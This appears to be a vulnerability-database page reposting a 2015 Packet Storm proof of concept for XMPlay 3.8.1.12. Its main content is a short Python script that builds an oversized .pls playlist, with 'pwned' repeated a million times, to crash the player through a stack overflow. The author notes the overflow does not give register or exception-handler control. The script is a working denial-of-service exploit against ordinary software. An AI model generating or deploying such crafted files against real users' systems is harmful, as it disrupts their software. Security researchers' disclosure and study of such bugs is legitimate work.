Lucene search
K

XMPlay 3.8.1.12 Proof Of Concept

🗓️ 16 Aug 2015 00:00:00Reported by St0rnType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 14 Views

Exploit for XMPlay 3.8.1.12 causing local crash using crafted PLS file on Windows 7.

Code
`#!/usr/bin/env python  
#  
# Exploit Title: XMPlay .pls Local Crash poc  
# Date: 2015-08-16  
# Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com>  
# Twitter: st0rnpentest  
#  
# Vendor Homepage: http://www.un4seen.com/  
# Software Link: http://www.un4seen.com/download.php?xmplay38  
# Version: 3.8.1.12  
# Tested on: Windows 7  
#  
  
  
# Stack Overflowing xmplay, but we can't   
# rewrite any register ou SE Handler  
  
def generateCrash():  
crash="""  
numberofentries=1  
file1="""  
  
crash+="pwned"*1000000  
return crash  
  
  
  
try:  
f=open("xmplay.pls","w")  
f.write(generateCrash())  
f.close  
print "Evil xmplay.pls generated!"  
except:  
print "I can't create file :/"  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation